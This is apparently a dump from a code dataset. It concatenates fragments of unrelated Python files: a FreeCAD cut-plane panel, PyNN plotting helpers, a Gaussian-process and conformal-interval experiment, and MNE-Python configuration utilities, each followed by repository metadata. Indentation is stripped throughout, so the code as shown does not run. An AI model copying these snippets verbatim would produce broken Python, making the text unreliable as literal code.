if s[1].SubObjects:
FreeCAD.ActiveDocument.openTransaction(translate("Arch","Cutting"))
FreeCADGui.addModule("Arch")
###TODO redo FreeCADGui.doCommand by using self.plan:
#FreeCADGui.doCommand("Arch.cutComponentwithPlane(FreeCADGui.Selection.getSelectionEx()[0],self.plan,"+ str(val) +")")
cutComponentwithPlane(FreeCADGui.Selection.getSelectionEx()[0],self.plan,val)
FreeCAD.ActiveDocument.commitTransaction()
FreeCAD.ActiveDocument.recompute()
return True
FreeCAD.Console.PrintError("Wrong selection\n")
return True
def reject(self):
FreeCAD.ActiveDocument.removeObject(self.previewObj.Name)
FreeCAD.Console.PrintMessage("Cancel Cut Plane\n")
return True
def getStandardButtons(self):
return int(QtGui.QDialogButtonBox.Ok|QtGui.QDialogButtonBox.Cancel)
def previewCutVolume(self, i):
cutVolume = ArchCommands.getCutVolume(self.plan,FreeCADGui.Selection.getSelectionEx()[0].Object.Shape)
FreeCAD.ActiveDocument.removeObject(self.previewObj.Name)
self.previewObj = FreeCAD.ActiveDocument.addObject("Part::Feature", "PreviewCutVolume")
self.previewObj.ViewObject.ShapeColor = (1.00,0.00,0.00)
self.previewObj.ViewObject.Transparency = 75
if i == 1:
cutVolume = cutVolume[1]
else:
cutVolume = cutVolume[2]
if cutVolume:
self.previewObj.Shape = cutVolume
def retranslateUi(self, TaskPanel):
TaskPanel.setWindowTitle(QtGui.QApplication.translate("Arch", "Cut Plane", None))
self.title.setText(QtGui.QApplication.translate("Arch", "Cut Plane options", None))
self.infoText.setText(QtGui.QApplication.translate("Arch", "Which side to cut", None))
self.combobox.addItems([QtGui.QApplication.translate("Arch", "Behind", None),
QtGui.QApplication.translate("Arch", "Front", None)])
if FreeCAD.GuiUp:
FreeCADGui.addCommand('Arch_CutPlane',_CommandCutPlane())
FreeCADGui.addCommand('Arch_CutLine', _CommandCutLine())
|
sanguinariojoe/FreeCAD
|
src/Mod/Arch/ArchCutPlane.py
|
Python
|
lgpl-2.1
| 8,639
|
[
"Galaxy"
] |
9be4d8032446f29d15ee959b985f0273a0dee7ea439c1f7970cd178ea1db7dcf
|
"""
Simple tools for plotting Neo-format data.
These tools are intended for quickly producing basic plots with simple
formatting. If you need to produce more complex and/or publication-quality
figures, it will probably be easier to use matplotlib or another plotting
package directly rather than trying to extend this module.
:copyright: Copyright 2006-2016 by the PyNN team, see AUTHORS.
:license: CeCILL, see LICENSE for details.
"""
from collections import defaultdict
from numbers import Number
from itertools import repeat
from os import path, makedirs
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import numpy as np
from quantities import ms
from neo import AnalogSignal, SpikeTrain
try:
from sys import maxint
except ImportError: # Py3
from sys import maxsize as maxint
DEFAULT_FIG_SETTINGS = {
'lines.linewidth': 0.5,
'axes.linewidth': 0.5,
'axes.labelsize': 'small',
'legend.fontsize': 'small',
'font.size': 8,
'savefig.dpi': 150,
}
def handle_options(ax, options):
if "xticks" not in options or options.pop("xticks") is False:
plt.setp(ax.get_xticklabels(), visible=False)
if "xlabel" in options:
ax.set_xlabel(options.pop("xlabel"))
if "yticks" not in options or options.pop("yticks") is False:
plt.setp(ax.get_yticklabels(), visible=False)
if "ylabel" in options:
ax.set_ylabel(options.pop("ylabel"))
if "ylim" in options:
ax.set_ylim(options.pop("ylim"))
if "xlim" in options:
ax.set_xlim(options.pop("xlim"))
def plot_signal(ax, signal, index=None, label='', **options):
"""
Plot a single channel from an AnalogSignal.
"""
if "ylabel" in options:
if options["ylabel"] == "auto":
options["ylabel"] = "%s (%s)" % (signal.name,
signal.units._dimensionality.string)
handle_options(ax, options)
if index is None:
label = "%s (Neuron %d)" % (label, signal.channel_index or 0)
else:
label = "%s (Neuron %d)" % (label, signal.channel_index[index])
signal = signal[:, index]
ax.plot(signal.times.rescale(ms), signal, label=label, **options)
ax.legend()
def plot_signals(ax, signal_array, label_prefix='', **options):
"""
Plot all channels in an AnalogSignal in a single panel.
"""
if "ylabel" in options:
if options["ylabel"] == "auto":
options["ylabel"] = "%s (%s)" % (signal_array.name,
signal_array.units._dimensionality.string)
handle_options(ax, options)
offset = options.pop("y_offset", None)
show_legend = options.pop("legend", True)
for i in signal_array.channel_index.index.argsort():
channel = signal_array.channel_index.index[i]
signal = signal_array[:, i]
if label_prefix:
label = "%s (Neuron %d)" % (label_prefix, channel)
else:
label = "Neuron %d" % channel
if offset:
signal += i * offset
ax.plot(signal.times.rescale(ms), signal, label=label, **options)
if show_legend:
ax.legend()
def plot_spiketrains(ax, spiketrains, label='', **options):
"""
Plot all spike trains in a Segment in a raster plot.
"""
ax.set_xlim(0, spiketrains[0].t_stop / ms)
handle_options(ax, options)
max_index = 0
min_index = maxint
for spiketrain in spiketrains:
ax.plot(spiketrain,
np.ones_like(spiketrain) * spiketrain.annotations['source_index'],
'k.', **options)
max_index = max(max_index, spiketrain.annotations['source_index'])
min_index = min(min_index, spiketrain.annotations['source_index'])
ax.set_ylabel("Neuron index")
ax.set_ylim(-0.5 + min_index, max_index + 0.5)
if label:
plt.text(0.95, 0.95, label,
transform=ax.transAxes, ha='right', va='top',
bbox=dict(facecolor='white', alpha=1.0))
def plot_array_as_image(ax, arr, label='', **options):
"""
Plots a numpy array as an image.
"""
handle_options(ax, options)
show_legend = options.pop("legend", True)
plt.pcolormesh(arr, **options)
ax.set_aspect('equal')
if label:
plt.text(0.95, 0.95, label,
transform=ax.transAxes, ha='right', va='top',
bbox=dict(facecolor='white', alpha=1.0))
if show_legend:
plt.colorbar()
def scatterplot(ax, data_table, label='', **options):
handle_options(ax, options)
if options.pop("show_fit", False):
plt.plot(data_table.x, data_table.y_fit, 'k-')
plt.scatter(data_table.x, data_table.y, **options)
if label:
plt.text(0.95, 0.95, label,
transform=ax.transAxes, ha='right', va='top',
bbox=dict(facecolor='white', alpha=1.0))
def plot_hist(ax, histogram, label='', **options):
handle_options(ax, options)
for t, n in histogram:
ax.bar(t, n, width=histogram.bin_width, color=None)
if label:
plt.text(0.95, 0.95, label,
transform=ax.transAxes, ha='right', va='top',
bbox=dict(facecolor='white', alpha=1.0))
def variable_names(segment):
"""
List the names of all the AnalogSignals (used for the variable name by
PyNN) in the given segment.
"""
return set(signal.name for signal in segment.analogsignals)
class Figure(object):
"""
Provide simple, declarative specification of multi-panel figures.
Example::
Figure(
Panel(segment.filter(name="v")[0], ylabel="Membrane potential (mV)")
Panel(segment.spiketrains, xlabel="Time (ms)"),
title="Network activity",
).save("figure3.png")
Valid options are:
`settings`:
for figure settings, e.g. {'font.size': 9}
`annotations`:
a (multi-line) string to be printed at the bottom of the figure.
`title`:
a string to be printed at the top of the figure.
"""
def __init__(self, *panels, **options):
n_panels = len(panels)
if "settings" in options and options["settings"] is not None:
settings = options["settings"]
else:
settings = DEFAULT_FIG_SETTINGS
plt.rcParams.update(settings)
width, height = options.get("size", (6, 2 * n_panels + 1.2))
self.fig = plt.figure(1, figsize=(width, height))
gs = gridspec.GridSpec(n_panels, 1)
if "annotations" in options:
gs.update(bottom=1.2 / height) # leave space for annotations
gs.update(top=1 - 0.8 / height, hspace=0.25)
#print(gs.get_grid_positions(self.fig))
for i, panel in enumerate(panels):
panel.plot(plt.subplot(gs[i, 0]))
if "title" in options:
self.fig.text(0.5, 1 - 0.5 / height, options["title"],
ha="center", va="top", fontsize="large")
if "annotations" in options:
plt.figtext(0.01, 0.01, options["annotations"], fontsize=6, verticalalignment='bottom')
def save(self, filename):
"""
Save the figure to file. The format is taken from the file extension.
"""
dirname = path.dirname(filename)
if dirname and not path.exists(dirname):
makedirs(dirname)
self.fig.savefig(filename)
class Panel(object):
"""
Represents a single panel in a multi-panel figure.
A panel is a Matplotlib Axes or Subplot instance. A data item may be an
AnalogSignal, AnalogSignal, or a list of SpikeTrains. The Panel will
automatically choose an appropriate representation. Multiple data items may
be plotted in the same panel.
Valid options are any valid Matplotlib formatting options that should be
applied to the Axes/Subplot, plus in addition:
`data_labels`:
a list of strings of the same length as the number of data items.
`line_properties`:
a list of dicts containing Matplotlib formatting options, of the
same length as the number of data items.
"""
def __init__(self, *data, **options):
self.data = list(data)
self.options = options
self.data_labels = options.pop("data_labels", repeat(None))
self.line_properties = options.pop("line_properties", repeat({}))
def plot(self, axes):
"""
Plot the Panel's data in the provided Axes/Subplot instance.
"""
for datum, label, properties in zip(self.data, self.data_labels, self.line_properties):
properties.update(self.options)
if isinstance(datum, DataTable):
scatterplot(axes, datum, label=label, **properties)
elif isinstance(datum, Histogram):
plot_hist(axes, datum, label=label, **properties)
elif isinstance(datum, AnalogSignal):
plot_signals(axes, datum, label_prefix=label, **properties)
elif isinstance(datum, list) and len(datum) > 0 and isinstance(datum[0], SpikeTrain):
plot_spiketrains(axes, datum, label=label, **properties)
elif isinstance(datum, np.ndarray):
if datum.ndim == 2:
plot_array_as_image(axes, datum, label=label, **properties)
else:
raise Exception("Can't handle arrays with %s dimensions" % datum.ndim)
else:
raise Exception("Can't handle type %s" % type(datum))
def comparison_plot(segments, labels, title='', annotations=None,
fig_settings=None, with_spikes=True):
"""
Given a list of segments, plot all the data they contain so as to be able
to compare them.
Return a Figure instance.
"""
variables_to_plot = set.union(*(variable_names(s) for s in segments))
print("Plotting the following variables: %s" % ", ".join(variables_to_plot))
# group signal arrays by name
n_seg = len(segments)
by_var_and_channel = defaultdict(lambda: defaultdict(list))
line_properties = []
for k, (segment, label) in enumerate(zip(segments, labels)):
lw = 2 * (n_seg - k) - 1
col = 'rbgmck'[k % 6]
line_properties.append({"linewidth": lw, "color": col})
for array in segment.analogsignals:
for i in array.channel_index.argsort():
channel = array.channel_index[i]
signal = array[:, i]
signal.channel_index = channel # Neo should do this in the previous line
by_var_and_channel[array.name][channel].append(signal)
# each panel plots the signals for a given variable.
panels = []
for by_channel in by_var_and_channel.values():
panels += [Panel(*array_list,
line_properties=line_properties,
data_labels=labels) for array_list in by_channel.values()]
if with_spikes and len(segments[0].spiketrains) > 0:
panels += [Panel(segment.spiketrains, data_labels=[label])
for segment, label in zip(segments, labels)]
panels[-1].options["xticks"] = True
panels[-1].options["xlabel"] = "Time (ms)"
fig = Figure(*panels,
title=title,
settings=fig_settings,
annotations=annotations)
return fig
class DataTable(object):
"""A lightweight encapsulation of x, y data for scatterplots."""
def __init__(self, x, y):
self.x = x
self.y = y
def fit_curve(self, f, p0, **fitting_parameters):
from scipy.optimize import curve_fit
self._f = f
self._p0 = p0
self._popt, self._pcov = curve_fit(f, self.x, self.y, p0, **fitting_parameters)
return self._popt, self._pcov
@property
def y_fit(self):
return self._f(self.x, *self._popt)
class Histogram(object):
"""A lightweight encapsulation of histogram data."""
def __init__(self, data):
self.data = data
self.evaluated = False
def evaluate(self):
if not self.evaluated:
n_bins = int(np.sqrt(len(self.data)))
self.values, self.bins = np.histogram(self.data, bins=n_bins)
self.bin_width = self.bins[1] - self.bins[0]
self.evaluated = True
def __iter__(self):
"""Iterate over the bars of the histogram"""
self.evaluate()
for x, y in zip(self.bins[:-1], self.values):
yield (x, y)
def isi_histogram(segment):
all_isis = np.concatenate([np.diff(np.array(st)) for st in segment.spiketrains])
return Histogram(all_isis)
|
anupkdas-nus/global_synapses
|
pyNN-dispackgaes/utility/plotting.py
|
Python
|
gpl-3.0
| 12,674
|
[
"NEURON"
] |
990b233b3f2be3fa67c171304725332eaad01dd8fd13d72d916e613e16c6d9b5
|
"""None"""
import time
import os
import numpy as np
from sklearn.grid_search import ParameterGrid
from sklearn.base import clone
from sklearn.gaussian_process import GaussianProcess
from scipy.stats import norm
from joblib import Parallel, delayed
from utils.state import _save
from utils.functions import gaussian
from utils.conformal import RRCM, CRR
from utils.KRR import KRR_AB
np.seterr(all="ignore")
BASE_PATH = os.path.join(".", "exp_gauss_1d")
if not os.path.exists(BASE_PATH):
os.mkdir(BASE_PATH)
n_jobs, verbose = -1, 0
parallel_ = Parallel(n_jobs=n_jobs, verbose=verbose)
## The levels and the random state
seeds_ = [0xB5066DBC, 0x98E8576F, 0x3161F88E, 0x08CCA9D9,]
random_state = np.random.RandomState(seeds_[1])
levels = np.asanyarray([0.01, 0.05, 0.10, 0.25])[::-1]
## helpers
def _helper(y, A, B, proc=RRCM, levels=levels, parallel=None, n_jobs=1, verbose=0):
if not isinstance(parallel, Parallel):
parallel = Parallel(n_jobs=n_jobs, verbose=verbose)
regions = parallel(delayed(proc)(A[k], B[k], levels=levels)
for k in xrange(y.shape[0]))
hits_ = np.asarray(
[[np.any(((int_[:, 0] <= target) & (target <= int_[:, 1]))).astype(float)
for int_ in region]
for target, region in zip(y, regions)])
width_ = np.asarray(
[[np.sum(int_[:, 1] - int_[:, 0]) for int_ in region] for region in regions])
bounds_ = np.asarray(
[[[int_[:, 0].min(), int_[:, 1].max()] for int_ in region] for region in regions])
return hits_, width_, bounds_
## Define the grid
true_theta = 100.0
true_nugget = [1e-6, 1e-1,]
grid_ = ParameterGrid(dict(size=[25, 50, 100, 200, 400, 600, 800, 1000, 1200, 1400, 1600,],
nugget=true_nugget,
theta0=[1e+1, 1e+2, 1e+3, "auto"]))
## Initialize
kernel = 'rbf' # 'laplacian'
gp = GaussianProcess(beta0=0, normalize=False, corr='squared_exponential')
# Generate input
XX_test = np.linspace(0, 1, num=1001).reshape((-1, 1))
XX_train = random_state.uniform(size=(10000, 1))
XX = np.concatenate([XX_test, XX_train], axis=0)
test_ = np.s_[:XX_test.shape[0]]
experiment, batch_, dumps_ = list(), 1, list()
for noise_ in true_nugget:
yy = gaussian(XX, scale=1.0, nugget=noise_, metric=kernel,
gamma=true_theta, random_state=random_state)
if yy.ndim == 1:
yy = yy.reshape((-1, 1))
## Split the pooled sample
yy_train, yy_test = np.delete(yy, test_, axis=0), yy[test_].copy()
for i_, par_ in enumerate(grid_):
print i_, par_
size_, nugget_, theta0_ = par_['size'], par_['nugget'], par_['theta0']
tick_ = time.time()
n_replications, replications = 25, list()
while n_replications > 0:
## Draw random train sample
train_ = random_state.choice(range(XX_train.shape[0]),
size=size_, replace=False)
X, y = XX_train[train_], yy_train[train_]
## Fit a GPR
gp_ = clone(gp)
gp_.nugget = nugget_
if isinstance(theta0_, float):
gp_.theta0 = theta0_
elif theta0_ == "auto":
gp_.thetaL, gp_.thetaU, gp_.theta0 = 1.0, 1e4, float(size_)
gp_.fit(X, y)
## Compute the A, B matrices
A, B, y_hat_, MM, loo_, A_loo, B_loo = \
KRR_AB(X, y, XX_test, forecast=True,
nugget=gp_.nugget, metric=kernel, gamma=gp_.theta_[0])
del loo_
## Construct the CKRR confidence interval: RRCM
rrcm_hits_, rrcm_width_, rrcm_bounds_ = \
_helper(yy_test, A[0], B, proc=RRCM,
levels=levels, parallel=parallel_)
## Construct the CKRR confidence interval: CCR-sided
crr_hits_, crr_width_, crr_bounds_ = \
_helper(yy_test, A[0], B, proc=CRR,
levels=levels, parallel=parallel_)
## Construct the CKRR confidence interval: RRCM
loo_rrcm_hits_, loo_rrcm_width_, loo_rrcm_bounds_ = \
_helper(yy_test, A_loo[0], B_loo, proc=RRCM,
levels=levels, parallel=parallel_)
## Construct the CKRR confidence interval: CCR-sided
loo_crr_hits_, loo_crr_width_, loo_crr_bounds_ = \
_helper(yy_test, A_loo[0], B_loo, proc=CRR,
levels=levels, parallel=parallel_)
## Construct the GPR forecast interval
z_a = norm.ppf(1 - .5 * levels)
half_width_ = np.sqrt(MM * gp_.sigma2) * z_a[np.newaxis]
bf_bounds_ = np.stack([y_hat_ - half_width_, y_hat_ + half_width_], axis=-1)
bf_width_ = bf_bounds_[..., 1] - bf_bounds_[..., 0]
bf_hits_ = ((bf_bounds_[..., 0] <= yy_test)
& (yy_test <= bf_bounds_[..., 1])).astype(float)
## Construct the GPR prediction interval
half_width_ = np.sqrt((MM - gp_.nugget) * gp_.sigma2) * z_a[np.newaxis]
bp_bounds_ = np.stack([y_hat_ - half_width_, y_hat_ + half_width_], axis=-1)
bp_width_ = bp_bounds_[..., 1] - bp_bounds_[..., 0]
bp_hits_ = ((bp_bounds_[..., 0] <= yy_test)
& (yy_test <= bp_bounds_[..., 1])).astype(float)
n_replications -= 1
replications.append((yy_test[:, 0], y_hat_[:, 0],
bp_width_, bp_hits_.mean(axis=0, keepdims=False),
bf_width_, bf_hits_.mean(axis=0, keepdims=False),
rrcm_width_, rrcm_hits_.mean(axis=0, keepdims=False),
crr_width_, crr_hits_.mean(axis=0, keepdims=False),
loo_rrcm_width_, loo_rrcm_hits_.mean(axis=0, keepdims=False),
loo_crr_width_, loo_crr_hits_.mean(axis=0, keepdims=False)))
tock_ = time.time()
print "%0.3fsec"%(tock_-tick_,)
key_ = "gaussian", noise_, theta0_, nugget_, size_
result_ = tuple(np.stack([rep_[j] for rep_ in replications], axis=-1) for j in xrange(14))
experiment.append((key_,) + result_)
if len(experiment) >= 25:
basename_ = os.path.join(BASE_PATH, "exp_gauss_1d%04d"%(batch_,))
dumps_.append(_save(experiment, basename_, gz=9))
experiment, batch_ = list(), batch_ + 1
if len(experiment) > 0:
basename_ = os.path.join(BASE_PATH, "exp_gauss_1d%04d"%(batch_,))
dumps_.append(_save(experiment, basename_, gz=9))
|
ivannz/study_notes
|
year_15_16/thesis/notebooks/gaussian_exp_1d.py
|
Python
|
mit
| 6,636
|
[
"Gaussian"
] |
1a0418f2794621d87f38e24804e90d4009e4457c12cf63076f2120a1827adb43
|
# -*- coding: utf-8 -*-
"""The config functions."""
# Authors: Eric Larson <larson.eric.d@gmail.com>
#
# License: BSD-3-Clause
import atexit
from functools import partial
import json
import os
import os.path as op
import platform
import shutil
import sys
import tempfile
import re
import numpy as np
from .check import (_validate_type, _check_pyqt5_version, _check_option,
_check_fname)
from .docs import fill_doc
from ._logging import warn, logger
_temp_home_dir = None
def set_cache_dir(cache_dir):
"""Set the directory to be used for temporary file storage.
This directory is used by joblib to store memmapped arrays,
which reduces memory requirements and speeds up parallel
computation.
Parameters
----------
cache_dir : str or None
Directory to use for temporary file storage. None disables
temporary file storage.
"""
if cache_dir is not None and not op.exists(cache_dir):
raise IOError('Directory %s does not exist' % cache_dir)
set_config('MNE_CACHE_DIR', cache_dir, set_env=False)
def set_memmap_min_size(memmap_min_size):
"""Set the minimum size for memmaping of arrays for parallel processing.
Parameters
----------
memmap_min_size : str or None
Threshold on the minimum size of arrays that triggers automated memory
mapping for parallel processing, e.g., '1M' for 1 megabyte.
Use None to disable memmaping of large arrays.
"""
if memmap_min_size is not None:
if not isinstance(memmap_min_size, str):
raise ValueError('\'memmap_min_size\' has to be a string.')
if memmap_min_size[-1] not in ['K', 'M', 'G']:
raise ValueError('The size has to be given in kilo-, mega-, or '
'gigabytes, e.g., 100K, 500M, 1G.')
set_config('MNE_MEMMAP_MIN_SIZE', memmap_min_size, set_env=False)
# List the known configuration values
known_config_types = (
'MNE_3D_OPTION_ANTIALIAS',
'MNE_BROWSE_RAW_SIZE',
'MNE_BROWSE_BACKEND',
'MNE_CACHE_DIR',
'MNE_COREG_ADVANCED_RENDERING',
'MNE_COREG_COPY_ANNOT',
'MNE_COREG_GUESS_MRI_SUBJECT',
'MNE_COREG_HEAD_HIGH_RES',
'MNE_COREG_HEAD_OPACITY',
'MNE_COREG_HEAD_INSIDE',
'MNE_COREG_INTERACTION',
'MNE_COREG_MARK_INSIDE',
'MNE_COREG_PREPARE_BEM',
'MNE_COREG_PROJECT_EEG',
'MNE_COREG_ORIENT_TO_SURFACE',
'MNE_COREG_SCALE_LABELS',
'MNE_COREG_SCALE_BY_DISTANCE',
'MNE_COREG_SCENE_SCALE',
'MNE_COREG_WINDOW_HEIGHT',
'MNE_COREG_WINDOW_WIDTH',
'MNE_COREG_SUBJECTS_DIR',
'MNE_CUDA_DEVICE',
'MNE_CUDA_IGNORE_PRECISION',
'MNE_DATA',
'MNE_DATASETS_BRAINSTORM_PATH',
'MNE_DATASETS_EEGBCI_PATH',
'MNE_DATASETS_EPILEPSY_ECOG_PATH',
'MNE_DATASETS_HF_SEF_PATH',
'MNE_DATASETS_MEGSIM_PATH',
'MNE_DATASETS_MISC_PATH',
'MNE_DATASETS_MTRF_PATH',
'MNE_DATASETS_SAMPLE_PATH',
'MNE_DATASETS_SOMATO_PATH',
'MNE_DATASETS_MULTIMODAL_PATH',
'MNE_DATASETS_FNIRS_MOTOR_PATH',
'MNE_DATASETS_OPM_PATH',
'MNE_DATASETS_SPM_FACE_DATASETS_TESTS',
'MNE_DATASETS_SPM_FACE_PATH',
'MNE_DATASETS_TESTING_PATH',
'MNE_DATASETS_VISUAL_92_CATEGORIES_PATH',
'MNE_DATASETS_KILOWORD_PATH',
'MNE_DATASETS_FIELDTRIP_CMC_PATH',
'MNE_DATASETS_PHANTOM_4DBTI_PATH',
'MNE_DATASETS_LIMO_PATH',
'MNE_DATASETS_REFMEG_NOISE_PATH',
'MNE_DATASETS_SSVEP_PATH',
'MNE_DATASETS_ERP_CORE_PATH',
'MNE_DATASETS_EPILEPSY_ECOG_PATH',
'MNE_FORCE_SERIAL',
'MNE_KIT2FIFF_STIM_CHANNELS',
'MNE_KIT2FIFF_STIM_CHANNEL_CODING',
'MNE_KIT2FIFF_STIM_CHANNEL_SLOPE',
'MNE_KIT2FIFF_STIM_CHANNEL_THRESHOLD',
'MNE_LOGGING_LEVEL',
'MNE_MEMMAP_MIN_SIZE',
'MNE_SKIP_FTP_TESTS',
'MNE_SKIP_NETWORK_TESTS',
'MNE_SKIP_TESTING_DATASET_TESTS',
'MNE_STIM_CHANNEL',
'MNE_TQDM',
'MNE_USE_CUDA',
'MNE_USE_NUMBA',
'SUBJECTS_DIR',
)
# These allow for partial matches, e.g. 'MNE_STIM_CHANNEL_1' is okay key
known_config_wildcards = (
'MNE_STIM_CHANNEL',
)
def _load_config(config_path, raise_error=False):
"""Safely load a config file."""
with open(config_path, 'r') as fid:
try:
config = json.load(fid)
except ValueError:
# No JSON object could be decoded --> corrupt file?
msg = ('The MNE-Python config file (%s) is not a valid JSON '
'file and might be corrupted' % config_path)
if raise_error:
raise RuntimeError(msg)
warn(msg)
config = dict()
return config
def get_config_path(home_dir=None):
r"""Get path to standard mne-python config file.
Parameters
----------
home_dir : str | None
The folder that contains the .mne config folder.
If None, it is found automatically.
Returns
-------
config_path : str
The path to the mne-python configuration file. On windows, this
will be '%USERPROFILE%\.mne\mne-python.json'. On every other
system, this will be ~/.mne/mne-python.json.
"""
val = op.join(_get_extra_data_path(home_dir=home_dir),
'mne-python.json')
return val
def get_config(key=None, default=None, raise_error=False, home_dir=None,
use_env=True):
"""Read MNE-Python preferences from environment or config file.
Parameters
----------
key : None | str
The preference key to look for. The os environment is searched first,
then the mne-python config file is parsed.
If None, all the config parameters present in environment variables or
the path are returned. If key is an empty string, a list of all valid
keys (but not values) is returned.
default : str | None
Value to return if the key is not found.
raise_error : bool
If True, raise an error if the key is not found (instead of returning
default).
home_dir : str | None
The folder that contains the .mne config folder.
If None, it is found automatically.
use_env : bool
If True, consider env vars, if available.
If False, only use MNE-Python configuration file values.
.. versionadded:: 0.18
Returns
-------
value : dict | str | None
The preference key value.
See Also
--------
set_config
"""
_validate_type(key, (str, type(None)), "key", 'string or None')
if key == '':
return known_config_types
# first, check to see if key is in env
if use_env and key is not None and key in os.environ:
return os.environ[key]
# second, look for it in mne-python config file
config_path = get_config_path(home_dir=home_dir)
if not op.isfile(config_path):
config = {}
else:
config = _load_config(config_path)
if key is None:
# update config with environment variables
if use_env:
env_keys = (set(config).union(known_config_types).
intersection(os.environ))
config.update({key: os.environ[key] for key in env_keys})
return config
elif raise_error is True and key not in config:
loc_env = 'the environment or in the ' if use_env else ''
meth_env = ('either os.environ["%s"] = VALUE for a temporary '
'solution, or ' % key) if use_env else ''
extra_env = (' You can also set the environment variable before '
'running python.' if use_env else '')
meth_file = ('mne.utils.set_config("%s", VALUE, set_env=True) '
'for a permanent one' % key)
raise KeyError('Key "%s" not found in %s'
'the mne-python config file (%s). '
'Try %s%s.%s'
% (key, loc_env, config_path, meth_env, meth_file,
extra_env))
else:
return config.get(key, default)
def set_config(key, value, home_dir=None, set_env=True):
"""Set a MNE-Python preference key in the config file and environment.
Parameters
----------
key : str
The preference key to set.
value : str | None
The value to assign to the preference key. If None, the key is
deleted.
home_dir : str | None
The folder that contains the .mne config folder.
If None, it is found automatically.
set_env : bool
If True (default), update :data:`os.environ` in addition to
updating the MNE-Python config file.
See Also
--------
get_config
"""
_validate_type(key, 'str', "key")
# While JSON allow non-string types, we allow users to override config
# settings using env, which are strings, so we enforce that here
_validate_type(value, (str, 'path-like', type(None)), 'value')
if value is not None:
value = str(value)
if key not in known_config_types and not \
any(k in key for k in known_config_wildcards):
warn('Setting non-standard config type: "%s"' % key)
# Read all previous values
config_path = get_config_path(home_dir=home_dir)
if op.isfile(config_path):
config = _load_config(config_path, raise_error=True)
else:
config = dict()
logger.info('Attempting to create new mne-python configuration '
'file:\n%s' % config_path)
if value is None:
config.pop(key, None)
if set_env and key in os.environ:
del os.environ[key]
else:
config[key] = value
if set_env:
os.environ[key] = value
# Write all values. This may fail if the default directory is not
# writeable.
directory = op.dirname(config_path)
if not op.isdir(directory):
os.mkdir(directory)
with open(config_path, 'w') as fid:
json.dump(config, fid, sort_keys=True, indent=0)
def _get_extra_data_path(home_dir=None):
"""Get path to extra data (config, tables, etc.)."""
global _temp_home_dir
if home_dir is None:
home_dir = os.environ.get('_MNE_FAKE_HOME_DIR')
if home_dir is None:
# this has been checked on OSX64, Linux64, and Win32
if 'nt' == os.name.lower():
if op.isdir(op.join(os.getenv('APPDATA'), '.mne')):
home_dir = os.getenv('APPDATA')
else:
home_dir = os.getenv('USERPROFILE')
else:
# This is a more robust way of getting the user's home folder on
# Linux platforms (not sure about OSX, Unix or BSD) than checking
# the HOME environment variable. If the user is running some sort
# of script that isn't launched via the command line (e.g. a script
# launched via Upstart) then the HOME environment variable will
# not be set.
if os.getenv('MNE_DONTWRITE_HOME', '') == 'true':
if _temp_home_dir is None:
_temp_home_dir = tempfile.mkdtemp()
atexit.register(partial(shutil.rmtree, _temp_home_dir,
ignore_errors=True))
home_dir = _temp_home_dir
else:
home_dir = os.path.expanduser('~')
if home_dir is None:
raise ValueError('mne-python config file path could '
'not be determined, please report this '
'error to mne-python developers')
return op.join(home_dir, '.mne')
def get_subjects_dir(subjects_dir=None, raise_error=False):
"""Safely use subjects_dir input to return SUBJECTS_DIR.
Parameters
----------
subjects_dir : str | None
If a value is provided, return subjects_dir. Otherwise, look for
SUBJECTS_DIR config and return the result.
raise_error : bool
If True, raise a KeyError if no value for SUBJECTS_DIR can be found
(instead of returning None).
Returns
-------
value : str | None
The SUBJECTS_DIR value.
"""
_validate_type(item=subjects_dir, types=('path-like', None),
item_name='subjects_dir', type_name='str or path-like')
if subjects_dir is None:
subjects_dir = get_config('SUBJECTS_DIR', raise_error=raise_error)
if subjects_dir is not None:
subjects_dir = _check_fname(
fname=subjects_dir, overwrite='read', must_exist=True,
need_dir=True, name='subjects_dir'
)
return subjects_dir
@fill_doc
def _get_stim_channel(stim_channel, info, raise_error=True):
"""Determine the appropriate stim_channel.
First, 'MNE_STIM_CHANNEL', 'MNE_STIM_CHANNEL_1', 'MNE_STIM_CHANNEL_2', etc.
are read. If these are not found, it will fall back to 'STI 014' if
present, then fall back to the first channel of type 'stim', if present.
Parameters
----------
stim_channel : str | list of str | None
The stim channel selected by the user.
%(info_not_none)s
Returns
-------
stim_channel : str | list of str
The name of the stim channel(s) to use
"""
if stim_channel is not None:
if not isinstance(stim_channel, list):
_validate_type(stim_channel, 'str', "Stim channel")
stim_channel = [stim_channel]
for channel in stim_channel:
_validate_type(channel, 'str', "Each provided stim channel")
return stim_channel
stim_channel = list()
ch_count = 0
ch = get_config('MNE_STIM_CHANNEL')
while(ch is not None and ch in info['ch_names']):
stim_channel.append(ch)
ch_count += 1
ch = get_config('MNE_STIM_CHANNEL_%d' % ch_count)
if ch_count > 0:
return stim_channel
if 'STI101' in info['ch_names']: # combination channel for newer systems
return ['STI101']
if 'STI 014' in info['ch_names']: # for older systems
return ['STI 014']
from ..io.pick import pick_types
stim_channel = pick_types(info, meg=False, ref_meg=False, stim=True)
if len(stim_channel) > 0:
stim_channel = [info['ch_names'][ch_] for ch_ in stim_channel]
elif raise_error:
raise ValueError("No stim channels found. Consider specifying them "
"manually using the 'stim_channel' parameter.")
return stim_channel
def _get_root_dir():
"""Get as close to the repo root as possible."""
root_dir = op.abspath(op.join(op.dirname(__file__), '..'))
up_dir = op.join(root_dir, '..')
if op.isfile(op.join(up_dir, 'setup.py')) and all(
op.isdir(op.join(up_dir, x)) for x in ('mne', 'examples', 'doc')):
root_dir = op.abspath(up_dir)
return root_dir
def _get_numpy_libs():
from ._testing import SilenceStdout
with SilenceStdout(close=False) as capture:
np.show_config()
lines = capture.getvalue().split('\n')
capture.close()
libs = []
for li, line in enumerate(lines):
for key in ('lapack', 'blas'):
if line.startswith('%s_opt_info' % key):
lib = lines[li + 1]
if 'NOT AVAILABLE' in lib:
lib = 'unknown'
else:
try:
lib = lib.split('[')[1].split("'")[1]
except IndexError:
pass # keep whatever it was
libs += ['%s=%s' % (key, lib)]
libs = ', '.join(libs)
return libs
def sys_info(fid=None, show_paths=False, *, dependencies='user'):
"""Print the system information for debugging.
This function is useful for printing system information
to help triage bugs.
Parameters
----------
fid : file-like | None
The file to write to. Will be passed to :func:`print()`.
Can be None to use :data:`sys.stdout`.
show_paths : bool
If True, print paths for each module.
dependencies : str
Can be "user" (default) to show user-relevant dependencies, or
"developer" to additionally show developer dependencies.
.. versionadded:: 0.24
Examples
--------
Running this function with no arguments prints an output that is
useful when submitting bug reports::
>>> import mne
>>> mne.sys_info() # doctest: +SKIP
Platform: Linux-4.15.0-1067-aws-x86_64-with-glibc2.2.5
